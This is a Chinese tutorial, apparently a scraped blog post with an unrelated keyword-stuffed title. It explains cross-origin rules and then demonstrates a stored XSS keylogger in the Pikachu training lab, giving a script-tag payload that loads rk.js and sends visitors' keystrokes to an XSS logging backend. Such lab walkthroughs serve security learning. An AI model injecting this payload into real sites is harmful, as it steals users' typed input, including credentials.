石岩小学网站建设,南京网站开发公司,网络销售公司,漳州网络推广前备知识
跨域 跨域#xff08;Cross-Origin#xff09;是指在互联网中#xff0c;浏览器为了保护用户信息安全而实施的一种安全策略——同源策略#xff08;Same-Origin Policy#xff09;#xff0c;即浏览器禁止一个域上的文档或者脚本#xff08;如通过JavaScript发…前备知识
跨域 跨域Cross-Origin是指在互联网中浏览器为了保护用户信息安全而实施的一种安全策略——同源策略Same-Origin Policy即浏览器禁止一个域上的文档或者脚本如通过JavaScript发起的HTTP请求与另一个域上的资源进行交互除非明确授权。 具体来说如果两个网页的协议HTTP/HTTPS、域名、端口号完全一致就被认为是同源。若从一个源例如域A加载的网页中的脚本尝试访问或操作另一个不同源例如域B的资源这种行为就会被浏览器阻止从而出现“跨域”问题。 跨域的主要目的是防止恶意网站通过嵌入的脚本获取并利用另一个网站的内容比如用户的敏感信息以避免诸如跨站脚本攻击XSS、跨站请求伪造CSRF等安全风险。 解决跨域问题的方法有多种包括但不限于 CORSCross-Origin Resource Sharing跨源资源共享服务器通过响应头允许特定源进行跨域访问。JSONPJSON with Padding通过动态创建script标签绕过同源策略适用于GET请求。WebSocket可以通过指定协议握手实现跨域通信。服务端代理将请求转发到其他服务器返回结果给客户端让客户端看起来像是在和服务端同源通信。window.postMessage API在不同窗口间进行跨域通信。WebRTC等现代Web技术也有相应的跨域机制。 通过存储xss漏洞注入xss代码进而获得用户的键盘记录
环境准备 1.安装好pikachu及其的后台 2.文件处理 1.rk.js 在pikachu\pkxss\rkeypress目录下 注上述网址一定要与本机部署的pikachu的网址一致才行此网址也为攻击者的文件网址 此处我的pikachu网址直接为localhost即127.0.0.1 本质该网址就为http://pikachu网址/pkxss/rkeypress/rkserver.php 实战 先上payload script src http://127.0.0.1/pkxss/rkeypress/rk.js /script 注意payload对应的网址也应与rs.js文件中的网址一致 查看控制台如果有除了以下的显示内容可能就是上述网址填错了请认真修改 此时我们已经将rk.js文件上传到了被攻击者网站中当有人访问该网页并留言我们就可以在xss后台看到该人的键盘记录如下演示 去往pikachu后台即可查看到 总结 此处xss漏洞主要利用src属性的跨站访问使得被攻击者可以通过src属性自动跳转到攻击者的xss平台祝各位学习顺利